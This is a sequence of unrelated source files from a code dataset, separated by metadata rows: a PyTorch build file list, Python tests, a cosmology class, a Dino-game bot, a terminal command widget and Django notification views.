"aten/src/ATen/native/ReduceAllOps.cpp",
"aten/src/ATen/native/ReduceOps.cpp",
"aten/src/ATen/native/ReflectionPad.cpp",
"aten/src/ATen/native/Repeat.cpp",
"aten/src/ATen/native/ReplicationPadding.cpp",
"aten/src/ATen/native/Resize.cpp",
"aten/src/ATen/native/RowwisePrune.cpp",
"aten/src/ATen/native/SegmentReduce.cpp",
"aten/src/ATen/native/Scalar.cpp",
"aten/src/ATen/native/SobolEngineOps.cpp",
"aten/src/ATen/native/SobolEngineOpsUtils.cpp",
"aten/src/ATen/native/SoftMax.cpp",
"aten/src/ATen/native/Sorting.cpp",
"aten/src/ATen/native/SpectralOps.cpp",
"aten/src/ATen/native/SummaryOps.cpp",
"aten/src/ATen/native/TensorAdvancedIndexing.cpp",
"aten/src/ATen/native/TensorCompare.cpp",
"aten/src/ATen/native/TensorConversions.cpp",
"aten/src/ATen/native/TensorFactories.cpp",
"aten/src/ATen/native/TensorIteratorReduce.cpp",
"aten/src/ATen/native/TensorProperties.cpp",
"aten/src/ATen/native/TensorShape.cpp",
"aten/src/ATen/native/TensorTransformations.cpp",
"aten/src/ATen/native/TestOps.cpp",
"aten/src/ATen/native/TriangularOps.cpp",
"aten/src/ATen/native/TypeProperties.cpp",
"aten/src/ATen/native/UnaryOps.cpp",
"aten/src/ATen/native/Unfold2d.cpp",
"aten/src/ATen/native/Unfold3d.cpp",
"aten/src/ATen/native/UnfoldBackward.cpp",
"aten/src/ATen/native/Unique.cpp",
# Low-level functions that can be directly referenced
# "aten/src/ATen/native/UpSample.cpp",
"aten/src/ATen/native/UpSampleBicubic2d.cpp",
"aten/src/ATen/native/UpSampleBilinear2d.cpp",
"aten/src/ATen/native/UpSampleLinear1d.cpp",
"aten/src/ATen/native/UpSampleNearest1d.cpp",
"aten/src/ATen/native/UpSampleNearest2d.cpp",
"aten/src/ATen/native/UpSampleNearest3d.cpp",
"aten/src/ATen/native/UpSampleTrilinear3d.cpp",
"aten/src/ATen/native/VariableMethodStubs.cpp",
"aten/src/ATen/native/WeightNorm.cpp",
"aten/src/ATen/native/group_norm.cpp",
"aten/src/ATen/native/layer_norm.cpp",
"aten/src/ATen/native/sparse/ParamUtils.cpp",
"aten/src/ATen/native/sparse/SoftMax.cpp",
"aten/src/ATen/native/sparse/SparseMatMul.cpp",
"aten/src/ATen/native/sparse/SparseTensor.cpp",
"aten/src/ATen/native/sparse/SparseCsrTensor.cpp",
"aten/src/ATen/native/sparse/SparseTensorMath.cpp",
"aten/src/ATen/native/sparse/SparseCsrTensorMath.cpp",
"aten/src/TH/THGeneral.cpp",
"aten/src/TH/THStorageFunctions.cpp",
"aten/src/TH/THTensor.cpp",
"aten/src/ATen/native/utils/Factory.cpp",
"aten/src/ATen/native/xnnpack/Activation.cpp",
"aten/src/ATen/native/xnnpack/ChannelShuffle.cpp",
"aten/src/ATen/native/xnnpack/Convolution.cpp",
"aten/src/ATen/native/xnnpack/AveragePooling.cpp",
"aten/src/ATen/native/xnnpack/Init.cpp",
"aten/src/ATen/native/xnnpack/Linear.cpp",
"aten/src/ATen/native/xnnpack/MaxPooling.cpp",
"aten/src/ATen/native/xnnpack/OpContext.cpp",
"aten/src/ATen/native/xnnpack/RegisterOpContextClass.cpp",
"aten/src/ATen/native/xnnpack/Shim.cpp",
# Files not in native, but depends on native symbols
# "aten/src/ATen/TensorIndexing.cpp",
"aten/src/ATen/TensorIterator.cpp",
"aten/src/ATen/nnapi/nnapi_register.cpp",
]
# 1. Files in ATen/native, with a few exceptions
# TODO: move the exceptions to proper locations
# 2. The full aten native source list combines the lists with and without the aten codegen process.
aten_native_source_list = sorted(aten_native_source_non_codegen_list + aten_native_source_codegen_list)
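# Sketch of the intended downstream use (per the comments above): CMake adds only
# the *_non_codegen_list files to ${all_cpu_cpp}, e.g.
#   all_cpu_cpp = aten_cpu_source_non_codegen_list + aten_native_source_non_codegen_list
# while the *_codegen_list entries are produced by the aten codegen step instead.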
| 47.099481
| 134
| 0.738608
|
4a1904463fbf8aed011d6c5d888f477e501d06b0
| 2,011
|
py
|
Python
|
tests/test_mate_tool_box_stateless.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 9
|
2017-09-07T21:21:43.000Z
|
2020-10-11T09:47:24.000Z
|
tests/test_mate_tool_box_stateless.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 2
|
2018-10-16T14:30:26.000Z
|
2020-12-05T02:40:46.000Z
|
tests/test_mate_tool_box_stateless.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 2
|
2017-09-05T14:06:01.000Z
|
2021-06-29T15:31:13.000Z
|
# -*- coding: utf-8 -*-
import pytest
from pytest import raises
from pathlib_mate.pathlib2 import Path
class TestToolBoxStateless(object):
def test_dir_fingerprint(self):
p = Path(Path(__file__).dirpath)
assert p.dir_md5 == p.dir_md5
assert p.dir_sha256 == p.dir_sha256
assert p.dir_sha512 == p.dir_sha512
def test_is_empty(self):
assert Path(__file__).is_empty() is False
assert Path(__file__).parent.is_empty() is False
with raises(Exception):
assert Path("THIS-FILE-NOT-EXISTS.txt").is_empty()
def test_auto_complete_choices(self):
p = Path(__file__).change(new_basename="te")
for p in p.auto_complete_choices():
assert p.basename.lower().startswith("te")
p = Path(__file__).parent
for p1 in p.auto_complete_choices():
assert p1 in p
def test_print_big_file(self):
"""
        Not needed on Travis.
"""
        path = Path(__file__).absolute().parent.parent  # pathlib_mate-project
path.print_big_file()
path.print_big_dir()
def test_print_big_dir_and_big_file(self):
"""
        Not needed on Travis.
"""
        path = Path(__file__).absolute().parent.parent  # pathlib_mate-project
path.print_big_dir_and_big_file()
def test_dir_stat_attribute(self):
p = Path(__file__).change(new_basename="app")
assert p.n_file >= 4
assert p.n_subfile >= 3
assert p.n_dir == 1
assert p.n_subdir == 1
def test_file_stat(self):
"""
        Not needed on Travis.
"""
p = Path(__file__).parent
stat = p.file_stat()
assert stat["file"] >= 14
assert stat["dir"] >= 2
assert stat["size"] >= 32000
all_stat = p.file_stat_for_all()
assert all_stat[p.abspath] == stat
if __name__ == "__main__":
import os
basename = os.path.basename(__file__)
pytest.main([basename, "-s", "--tb=native"])
| 28.323944
| 79
| 0.606663
|
4a19046c82885ac3bedad4c34dc99c2befbadb4b
| 8,128
|
py
|
Python
|
clmm/cosmology/parent_class.py
|
LSSTDESC/CLMM
|
7922ad984a297393d57b3f89ed708fec18e04e3a
|
[
"BSD-3-Clause"
] | 20
|
2018-02-23T22:28:39.000Z
|
2022-03-24T07:03:47.000Z
|
clmm/cosmology/parent_class.py
|
LSSTDESC/CLMM
|
7922ad984a297393d57b3f89ed708fec18e04e3a
|
[
"BSD-3-Clause"
] | 446
|
2018-06-01T17:43:41.000Z
|
2022-03-31T13:29:23.000Z
|
clmm/cosmology/parent_class.py
|
LSSTDESC/CLMM
|
7922ad984a297393d57b3f89ed708fec18e04e3a
|
[
"BSD-3-Clause"
] | 20
|
2019-01-18T08:16:11.000Z
|
2022-03-29T05:27:00.000Z
|
"""@file parent_class.py
"""
# CLMM Cosmology object abstract superclass
import numpy as np
class CLMMCosmology:
"""
Cosmology object superclass for supporting multiple back-end cosmology objects
Attributes
----------
backend: str
Name of back-end used
be_cosmo: cosmology library
Cosmology library used in the back-end
"""
def __init__(self, **kwargs):
self.backend = None
self.be_cosmo = None
self.set_be_cosmo(**kwargs)
def __getitem__(self, key):
if isinstance(key, str):
return self._get_param(key)
raise TypeError(f'input must be str, not {type(key)}')
def __setitem__(self, key, val):
if isinstance(key, str):
self._set_param(key, val)
else:
raise TypeError(f'key input must be str, not {type(key)}')
def _init_from_cosmo(self, be_cosmo):
"""
To be filled in child classes
"""
raise NotImplementedError
def _init_from_params(self, **kwargs):
"""
To be filled in child classes
"""
raise NotImplementedError
def _set_param(self, key, value):
"""
To be filled in child classes
"""
raise NotImplementedError
def _get_param(self, key):
"""
To be filled in child classes
"""
raise NotImplementedError
def get_desc(self):
"""
Returns the Cosmology description.
"""
return (f"{type(self).__name__}(H0={self['H0']}, Omega_dm0={self['Omega_dm0']}, "
f"Omega_b0={self['Omega_b0']}, Omega_k0={self['Omega_k0']})")
def set_be_cosmo(self, be_cosmo=None, H0=67.66, Omega_b0=0.049, Omega_dm0=0.262, Omega_k0=0.0):
"""Set the cosmology
Parameters
----------
be_cosmo: clmm.cosmology.Cosmology object, None
Input cosmology, used if not None
        H0, Omega_b0, Omega_dm0, Omega_k0 : float
            Individual cosmological parameters, used when be_cosmo is None
"""
if be_cosmo:
self._init_from_cosmo(be_cosmo)
else:
self._init_from_params(
H0=H0, Omega_b0=Omega_b0, Omega_dm0=Omega_dm0, Omega_k0=Omega_k0)
def get_Omega_m(self, z):
r"""Gets the value of the dimensionless matter density
.. math::
\Omega_m(z) = \frac{\rho_m(z)}{\rho_\mathrm{crit}(z)}.
Parameters
----------
z : float
Redshift.
Returns
-------
Omega_m : float
dimensionless matter density, :math:`\Omega_m(z)`.
Notes
-----
        Need to decide if non-relativistic neutrinos will contribute here.
"""
raise NotImplementedError
def get_E2Omega_m(self, z):
r"""Gets the value of the dimensionless matter density times hubble parameter
(normalized at 0)
.. math::
\Omega_m(z) = \frac{\rho_m(z)}{\rho_\mathrm{crit}(z)}\frac{H(z)^{2}}{H_{0}^{2}}.
Parameters
----------
z : float
Redshift.
Returns
-------
Omega_m : float
dimensionless matter density, :math:`\Omega_m(z)\;H(z)^{2}/H_{0}^{2}`.
Notes
-----
        Need to decide if non-relativistic neutrinos will contribute here.
"""
raise NotImplementedError
def eval_da_z1z2(self, z1, z2):
r"""Computes the angular diameter distance between z1 and z2.
.. math::
d_a(z1, z2) = \frac{c}{H_0}\frac{1}{1+z2}\int_{z1}^{z2}\frac{dz'}{E(z')}
Parameters
----------
z1 : float
Redshift.
z2 : float
Redshift.
Returns
-------
float
Angular diameter distance in units :math:`M\!pc`
Notes
-----
Describe the vectorization.
"""
raise NotImplementedError
def eval_da(self, z):
r"""Computes the angular diameter distance between 0.0 and z.
.. math::
d_a(z) = \frac{c}{H_0}\frac{1}{1+z}\int_{0}^{z}\frac{dz'}{E(z')}
Parameters
----------
z : float
Redshift.
Returns
-------
float
Angular diameter distance in units :math:`M\!pc`
Notes
-----
Describe the vectorization.
"""
return self.eval_da_z1z2(0.0, z)
def eval_da_a1a2(self, a1, a2=1.):
r"""This is a function to calculate the angular diameter distance
between two scale factors.
.. math::
d_a(a1, a2) = \frac{c}{H_0}a2\int_{a2}^{a1}\frac{da'}{a'^2E(a')}
If only a1 is specified, this function returns the angular diameter
distance from a=1 to a1. If both a1 and a2 are specified, this function
returns the angular diameter distance between a1 and a2.
.. math::
d_a(a) = \frac{c}{H_0}a\int_{a}^{1}\frac{da'}{a'^2E(a')}
Parameters
----------
a1 : float
Scale factor.
a2 : float, optional
Scale factor.
Returns
-------
float
Angular diameter distance in units :math:`M\!pc`
"""
z1 = self.get_z_from_a(a2)
z2 = self.get_z_from_a(a1)
return self.eval_da_z1z2(z1, z2)
def get_a_from_z(self, z):
""" Convert redshift to scale factor
Parameters
----------
z : array_like
Redshift
Returns
-------
scale_factor : array_like
Scale factor
"""
z = np.array(z)
if np.any(z < 0.0):
raise ValueError(
"Cannot convert negative redshift to scale factor")
return 1.0/(1.0+z)
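    # Example: get_a_from_z(1.0) == 0.5 and get_z_from_a(0.5) == 1.0, since a = 1/(1+z).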
def get_z_from_a(self, a):
""" Convert scale factor to redshift
Parameters
----------
a : array_like
Scale factor
Returns
-------
z : array_like
Redshift
"""
a = np.array(a)
if np.any(a > 1.0):
raise ValueError(
"Cannot convert invalid scale factor a > 1 to redshift")
return (1.0/a)-1.0
def rad2mpc(self, dist1, redshift):
r""" Convert between radians and Mpc using the small angle approximation
and :math:`d = D_A \theta`.
Parameters
----------
dist1 : array_like
Input distances in radians
redshift : float
Redshift used to convert between angular and physical units
Returns
-------
dist2 : array_like
Distances in Mpc
"""
return dist1*self.eval_da(redshift)
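    # Sketch: rad2mpc multiplies by the angular diameter distance (d = D_A * theta),
    # while mpc2rad below divides by it, so the two are inverses at fixed redshift.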
def mpc2rad(self, dist1, redshift):
r""" Convert between radians and Mpc using the small angle approximation
and :math:`d = D_A \theta`.
Parameters
----------
dist1 : array_like
Input distances in Mpc
redshift : float
Redshift used to convert between angular and physical units
Returns
-------
dist2 : array_like
Distances in radians
"""
return dist1/self.eval_da(redshift)
def eval_sigma_crit(self, z_len, z_src):
r"""Computes the critical surface density
Parameters
----------
z_len : float
Lens redshift
z_src : array_like, float
Background source galaxy redshift(s)
Returns
-------
float
Cosmology-dependent critical surface density in units of :math:`M_\odot\ Mpc^{-2}`
"""
raise NotImplementedError
| 28.222222
| 99
| 0.537156
|
4a190474fa5033567b41ff69bb8aa80a9f02ee4d
| 1,223
|
pyw
|
Python
|
Dino_Hack/Dino.pyw
|
SoumadeepChoudhury/Projects
|
d68f2c289e047fadfb077c51485474b33a7e1498
|
[
"MIT"
] | 1
|
2021-10-05T03:03:19.000Z
|
2021-10-05T03:03:19.000Z
|
Dino_Hack/Dino.pyw
|
SoumadeepChoudhury/Projects
|
d68f2c289e047fadfb077c51485474b33a7e1498
|
[
"MIT"
] | null | null | null |
Dino_Hack/Dino.pyw
|
SoumadeepChoudhury/Projects
|
d68f2c289e047fadfb077c51485474b33a7e1498
|
[
"MIT"
] | null | null | null |
import pyautogui
from PIL import Image, ImageGrab
import time
def hit(key):
pyautogui.keyDown(key)
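# The collision checks below scan a fixed pixel window ahead of the dino; a
# grayscale value < 100 (light theme) or > 150 (dark theme) marks an obstacle.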
# LIGHT
def isCollide(data):
# Check for birds
#for i in range(200, 250):
# for j in range(355, 370):
# if data[i, j] < 171:
# hit("down")
# return
# Check for Cactus
for i in range(230, 250):
for j in range(400, 470):
if data[i, j] < 100:
hit("up")
return
return
# DARK
def isCollideDark(data):
# # Check for birds
# for i in range(200, 215):
# for j in range(310, 380):
# if data[i, j] < 171:
# hit("down")
# return
# Check for Cactus
for i in range(230, 250):
for j in range(400, 470):
if data[i, j] > 150:
hit("up")
return
return
if __name__ == "__main__":
print("Let's Start in 2 sec...")
time.sleep(2)
hit('up')
while True:
image = ImageGrab.grab().convert('L')
data = image.load()
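        # Pixel (15, 110) samples the page background: a bright value means the
        # light theme is active, so the matching threshold check is used.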
if data[15, 110] > 200:
isCollide(data)
else:
isCollideDark(data)
| 21.086207
| 50
| 0.464432
|
4a1905357b6c4c0668900a89a5f97c9ed4e93740
| 928
|
py
|
Python
|
nonebot_plugin_heybox/__init__.py
|
SimonHurricane5/nonebot_plugin_heybox
|
6c2b68bc35b0ae3908565ce9483fe622276dfd5c
|
[
"MIT"
] | 1
|
2022-02-16T04:57:48.000Z
|
2022-02-16T04:57:48.000Z
|
nonebot_plugin_heybox/__init__.py
|
SimonHurricane5/nonebot_plugin_heybox
|
6c2b68bc35b0ae3908565ce9483fe622276dfd5c
|
[
"MIT"
] | null | null | null |
nonebot_plugin_heybox/__init__.py
|
SimonHurricane5/nonebot_plugin_heybox
|
6c2b68bc35b0ae3908565ce9483fe622276dfd5c
|
[
"MIT"
] | null | null | null |
from nonebot.params import State, CommandArg
from nonebot import on_command, on_regex, on_keyword
from nonebot.adapters.onebot.v11 import Bot, MessageEvent, GROUP, MessageSegment, Event, Message, GroupMessageEvent
from .heybox_crawler import *
heybox_search = on_command("小黑盒搜", aliases={"查游戏", "查史低"}, priority=46, block=True)
heybox_lowest = on_command("小黑盒史低", priority=46, block=True)
@heybox_search.handle()
async def _(bot: Bot, event: GroupMessageEvent, args: Message = CommandArg()):
game_name = args.extract_plain_text().strip()
if not game_name:
        await heybox_search.finish("Please enter the name of the game you want to look up~")
else:
result = heybox_search_crawler(game_name)
await heybox_search.finish(result)
# @heybox_lowest.handle()
# async def _(bot: Bot, event: GroupMessageEvent, args: Message = CommandArg()):
#
# msg = heybox_lowest_crawler()
# await heybox_lowest.finish(msg)
| 38.666667
| 116
| 0.724138
|
4a190584f5f6769566df3c0c772785776f28fd7d
| 59
|
py
|
Python
|
web/mysql_config.py
|
semodi/arxiv_app
|
e33e8e1eae96e25cf41d4169dca82d88615e5d08
|
[
"BSD-3-Clause"
] | 1
|
2022-02-08T19:55:19.000Z
|
2022-02-08T19:55:19.000Z
|
web/mysql_config.py
|
semodi/paper-scraper
|
e33e8e1eae96e25cf41d4169dca82d88615e5d08
|
[
"BSD-3-Clause"
] | null | null | null |
web/mysql_config.py
|
semodi/paper-scraper
|
e33e8e1eae96e25cf41d4169dca82d88615e5d08
|
[
"BSD-3-Clause"
] | null | null | null |
host = 'db'
name = 'root'
password = 'mypassword'
port = 3306
| 11.8
| 22
| 0.677966
|
4a1906b7ca79a64ceba13d19eb3154baf24b2a37
| 1,469
|
py
|
Python
|
test/test_modify_contact.py
|
kochetov-a/python_training
|
20cb104dea8b743c576b8c02a4dedc13679ff384
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
kochetov-a/python_training
|
20cb104dea8b743c576b8c02a4dedc13679ff384
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
kochetov-a/python_training
|
20cb104dea8b743c576b8c02a4dedc13679ff384
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from model.contact import Contact
from random import randrange
# Modify a random contact from the list
def test_modify_contact_by_index(app, db, check_ui):
    if len(db.get_contact_list()) == 0:  # Get the contact list from the DB
        app.contact.create(Contact(first_name="Contact Test", last_name="Test Contact"))  # If the list is empty, create a new contact
    contact = Contact(first_name="first_name_test", last_name="last_name_test")  # New parameters for the contact
    old_contacts = db.get_contact_list()  # Save the contact list from the DB before the modification
    index = randrange(len(old_contacts))  # Pick the index of a random contact
    contact.id = old_contacts[index].id  # Keep the id of the selected contact
    app.contact.modify_contact_by_id(contact.id, contact)  # Modify the selected contact from the list
    new_contacts = db.get_contact_list()  # Save the contact list AFTER the modification
    old_contacts[index] = contact  # Assign the new parameters to the contact by id
    # Compare the contact lists sorted by key (id)
    assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
    if check_ui:  # Enable the UI check when the "--check_ui" flag is passed
        # Compare the contact lists sorted by key (id)
        assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
| 66.772727
| 132
| 0.761743
|
4a19088e1e283d70a5d48f36ef4b1606eb035051
| 6,997
|
py
|
Python
|
unittests/test_dataset_creation/test_image_transformations/test_patching.py
|
imsb-uke/ecarenet
|
ffbf24e740d9154312d02b9f775816ed4b3d4691
|
[
"MIT"
] | 1
|
2022-01-25T09:49:45.000Z
|
2022-01-25T09:49:45.000Z
|
unittests/test_dataset_creation/test_image_transformations/test_patching.py
|
imsb-uke/ecarenet
|
ffbf24e740d9154312d02b9f775816ed4b3d4691
|
[
"MIT"
] | null | null | null |
unittests/test_dataset_creation/test_image_transformations/test_patching.py
|
imsb-uke/ecarenet
|
ffbf24e740d9154312d02b9f775816ed4b3d4691
|
[
"MIT"
] | null | null | null |
import unittest
from matplotlib import pyplot as plt
import tensorflow as tf
import os
import numpy as np
from dataset_creation.image_transformations.patching import create_patches, advanced_patching, tf_create_patches
from unittests.unittest_helpers import create_image_label_dataset
class TestPatching(unittest.TestCase):
def test_create_patches(self):
"""
        Test that takes an image as input and cuts it into patches.
        Different sorting orders for patches are available and all tested here.
        In every case the resulting shape of the patches is known and tested for.
"""
        debug = False  # if set to True, will plot patches
# read an image
directory = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', '..', 'unittest_data', 'example_colors'))
image = tf.io.read_file(os.path.join(directory, "img_red_0.png"))
image = tf.image.decode_image(image, 3)
image = tf.cast(image, dtype=tf.dtypes.float32)
image = tf.image.resize(image, (2048, 2048))
image = image.numpy()
# test with order = ranked
patches, idx_v, idx_h, _ = create_patches(image, 512, 0, 0, n_patches=4, order='ranked')
self.assertEqual(patches.shape, (4, 512, 512, 3))
# test with order = original
patches, idx_v, idx_h, _ = create_patches(image, 512, 0, 0, order='original')
self.assertTrue(len(idx_v) == len(idx_h) == 16)
self.assertEqual(patches.shape, (16, 512, 512, 3))
self.assertFalse(np.all(patches[-1] == [33, 22, 17]))
# the indices of patches that are returned are supposed to be in original order here
self.assertTrue(np.all(idx_h == np.array([0, 512, 1024, 1536,
0, 512, 1024, 1536,
0, 512, 1024, 1536,
0, 512, 1024, 1536])))
self.assertTrue(np.all(idx_v == np.array([0, 0, 0, 0,
512, 512, 512, 512,
1024, 1024, 1024, 1024,
1536, 1536, 1536, 1536])))
if debug:
for i in range(len(patches)):
ax = plt.subplot(4, 4, i + 1)
ax.axis('off')
ax.imshow(patches[i] / 255)
plt.show()
# test with order = shuffle
patches, idx_v, idx_h, _ = create_patches(image, 512, 0, 0, n_patches=9, order='shuffle')
self.assertTrue(len(idx_v) == len(idx_h) == 9)
def test_create_patches_overlap(self):
"""
        Test that takes an image as input and cuts it into patches.
        Different sorting orders for patches are available and all tested here.
        In every case the resulting shape of the patches is known and tested for.
"""
debug = False # if set to True, plots patches
# read an image
directory = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', '..', 'unittest_data', 'example_colors'))
image = tf.io.read_file(os.path.join(directory, "img_red_0.png"))
image = tf.image.decode_image(image, 3)
image = tf.cast(image, dtype=tf.dtypes.float32)
image = tf.image.resize(image, (2048, 2048))
image = image.numpy()
# test with order = ranked
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=16, order='ranked')
self.assertEqual(patches.shape, (16, 512, 512, 3))
# test with order = original
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=16, order='original')
self.assertTrue(len(idx_v) == len(idx_h) == 16)
self.assertEqual(patches.shape, (16, 512, 512, 3))
if debug:
for i in range(len(patches)):
ax = plt.subplot(5, 5, i + 1)
ax.axis('off')
ax.imshow(patches[i] / 255)
plt.show()
# the indices of patches that are returned are supposed to be in original order here
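        # With patch_size=512 and overlap=16 the stride is 512 - 16 = 496, so the
        # k-th offset is k*496, i.e. the 512-16, 1024-32, 1536-48, ... pattern below.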
self.assertTrue(np.all(idx_h == np.array([0, 512-16, 1024-32, 1536-48, 2048-64,
0, 512-16, 1024-32, 1536-48, 2048-64,
0, 512-16, 1024-32, 1536-48, 2048-64,
0])))
self.assertTrue(np.all(idx_v == np.array([0, 0, 0, 0, 0,
512-16, 512-16, 512-16, 512-16, 512-16,
1024-32, 1024-32, 1024-32, 1024-32, 1024-32,
1536-48])))
# test with order = shuffle
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=9, order='shuffle')
self.assertTrue(len(idx_v) == len(idx_h) == 9)
# test with order = shuffle_ranked
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=9, order='shuffle_ranked')
self.assertTrue(len(idx_v) == len(idx_h) == 9)
# test with more patches than usually cut (extend with white patches)
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=30, order='ranked')
self.assertTrue(len(idx_v) == len(idx_h) == 30)
if debug:
for i in range(30):
plt.subplot(5, 6, i + 1)
plt.imshow(patches[i] / 255)
plt.axis('off')
plt.show()
def test_create_patches_map(self):
"""
        Test that the patching function also works with the tensorflow mapping
        function, since this can otherwise cause problems.
"""
# create a dataset with an image and an artificial label
labelin = "3"
patch_size = 512
overlap = 0
n_patches = 16
order = 'original'
dataset = create_image_label_dataset(1, labelin)
        # apply patching function
dataset = dataset.map(lambda x, y: (tf_create_patches(x, patch_size, overlap, overlap, n_patches, order, 3)[0], y))
for d in dataset.take(1):
self.assertEqual(d[0].shape, (n_patches, 512, 512, 3))
def test_advanced_patching(self):
"""
        Test the function advanced_patching separately.
"""
directory = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', '..', 'unittest_data', 'example_colors'))
image = tf.io.read_file(os.path.join(directory, "img_red_0.png"))
image = tf.image.decode_image(image, 3)
image = tf.cast(image, dtype=tf.dtypes.float32)
image = image.numpy()
patch_size = 500
n_patches = 4
patches, _, _, _ = advanced_patching(image, patch_size, n_patches, order='ranked')
self.assertEqual(patches.shape, (4, 500, 500, 3))
| 46.646667
| 123
| 0.556381
|
4a190a29935ae4dfc42e4f51ec71fa881f9b2dbc
| 3,809
|
py
|
Python
|
mitzasql/ui/widgets/command_edit.py
|
vladbalmos/mitzasql
|
06c2a96eb4494095b2b72bc1454199a4940b0700
|
[
"MIT"
] | 69
|
2019-05-16T06:40:18.000Z
|
2022-03-24T06:23:49.000Z
|
mitzasql/ui/widgets/command_edit.py
|
vladbalmos/mitzasql
|
06c2a96eb4494095b2b72bc1454199a4940b0700
|
[
"MIT"
] | 36
|
2019-05-15T19:55:24.000Z
|
2021-07-22T07:07:14.000Z
|
mitzasql/ui/widgets/command_edit.py
|
vladbalmos/mitzasql
|
06c2a96eb4494095b2b72bc1454199a4940b0700
|
[
"MIT"
] | 8
|
2019-05-16T06:56:28.000Z
|
2022-02-11T02:24:12.000Z
|
# Copyright (c) 2021 Vlad Balmos <vladbalmos@yahoo.com>
# Author: Vlad Balmos <vladbalmos@yahoo.com>
# See LICENSE file
import urwid
from .emacs_edit import EmacsEdit
class CommandEdit(EmacsEdit):
'''Implement a basic VIM style command edit widget'''
SIGNAL_CANCEL = 'cancel_edit'
def __init__(self, command_processor):
self._command_processor = command_processor
self._marker = None
super().__init__()
urwid.register_signal(self.__class__, self.SIGNAL_CANCEL)
def set_marker(self, marker):
self.set_caption(marker)
self._marker = marker
def _show_prev_command(self):
item = self._command_processor.history.prev
if not item:
return
self.edit_text = item
self.edit_pos = len(item)
def _show_next_command(self):
item = self._command_processor.history.next
if not item:
return
self.edit_text = item
self.edit_pos = len(item)
def _cancel_edit(self):
urwid.emit_signal(self, self.SIGNAL_CANCEL, self)
def show_last_cmd(self):
last_cmd = self._command_processor.history.last
if not last_cmd:
return
self.edit_text = last_cmd
self.edit_pos = len(last_cmd)
def keypress(self, size, key):
if (key == 'tab' or key == 'shift tab') and self._marker == ':':
if key == 'shift tab':
direction = 'back'
else:
direction = 'forward'
if self._autocomplete(direction):
return None
if key != 'tab' and key != 'shift tab':
self._autocomplete(reset=True)
if key == 'esc':
self._cancel_edit()
return
key = super().keypress(size, key)
if key == 'enter':
text = self.edit_text
marker = self._marker
self._cancel_edit()
self._command_processor.execute(str_cmd_marker=marker,
cmd=text)
return
# Show previous command
if key == 'ctrl p':
self._show_prev_command()
return
# Show next command
if key == 'ctrl n':
self._show_next_command()
return
return key
def _autocomplete(self, direction='forward', reset=False):
if reset is True:
self._command_processor.reset_autocomplete()
return
text = self.edit_text
pos = self.edit_pos
space_pos = text.find(' ')
segments = text.split(' ')
suggestion = None
new_pos = None
# Autocomplete first word
if pos <= len(segments[0]):
if pos <= space_pos or space_pos == -1:
suggestion = self._command_processor.autocomplete(segments[0],
command=True, direction=direction)
if suggestion:
segments[0] = suggestion
new_pos = len(suggestion)
# Autocomplete second word
if pos > space_pos and space_pos > -1:
next_space_pos = text.find(' ', space_pos + 1)
if pos > next_space_pos and next_space_pos > -1:
return
suggestion = self._command_processor.autocomplete(segments[1],
argument=True, command_name=segments[0],
direction=direction)
if suggestion:
segments[1] = suggestion
new_pos = len(segments[0]) + len(suggestion) + 1
if suggestion:
text = ' '.join(segments)
self.edit_text = text
self.edit_pos = new_pos
return True
def reset(self):
self._marker = ''
self.set_caption('')
self.edit_text = ''
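# Minimal usage sketch (hypothetical wiring; command_processor and on_cancel are
# assumed to exist elsewhere):
#   edit = CommandEdit(command_processor)
#   edit.set_marker(':')
#   urwid.connect_signal(edit, CommandEdit.SIGNAL_CANCEL, on_cancel)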
| 29.3
| 78
| 0.559727
|
4a190abb645c728c3829bbce7802b6d0e783cb31
| 241
|
py
|
Python
|
abc062/a.py
|
y-sira/atcoder
|
479cb8d219ba812c2b8dc7dcbe8f6241ec3c12a3
|
[
"MIT"
] | null | null | null |
abc062/a.py
|
y-sira/atcoder
|
479cb8d219ba812c2b8dc7dcbe8f6241ec3c12a3
|
[
"MIT"
] | null | null | null |
abc062/a.py
|
y-sira/atcoder
|
479cb8d219ba812c2b8dc7dcbe8f6241ec3c12a3
|
[
"MIT"
] | null | null | null |
x, y = map(int, input().split())
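# Months grouped by length: g1 = 31-day months, g2 = 30-day months, g3 = February.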
g1 = [1, 3, 5, 7, 8, 10, 12]
g2 = [4, 6, 9, 11]
g3 = [2]
if x in g1 and y in g1:
print('Yes')
elif x in g2 and y in g2:
print('Yes')
elif x in g3 and y in g3:
print('Yes')
else:
print('No')
| 16.066667
| 32
| 0.510373
|
4a190b1f2e75dc5aa77aeebd0e28d4ebe889d837
| 6,593
|
py
|
Python
|
notification/views.py
|
Toflex/notification
|
eb0700d00543fea38f97daa264dc146885192a54
|
[
"MIT"
] | null | null | null |
notification/views.py
|
Toflex/notification
|
eb0700d00543fea38f97daa264dc146885192a54
|
[
"MIT"
] | null | null | null |
notification/views.py
|
Toflex/notification
|
eb0700d00543fea38f97daa264dc146885192a54
|
[
"MIT"
] | null | null | null |
from django.urls import reverse
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, Http404, HttpResponse
from django.contrib.auth.decorators import login_required
try:
from django.contrib.syndication.views import feed
except ImportError:
from django.contrib.syndication.views import Feed as feed
from .models import *
from .decorators import basic_auth_required, simple_basic_auth_callback
from .feeds import NoticeUserFeed
@basic_auth_required(realm="Notices Feed", callback_func=simple_basic_auth_callback)
def feed_for_user(request):
"""
An atom feed for all unarchived :model:`notification.Notice`s for a user.
"""
url = "feed/%s" % request.user.username
return feed(request, url, {
"feed": NoticeUserFeed,
})
@login_required
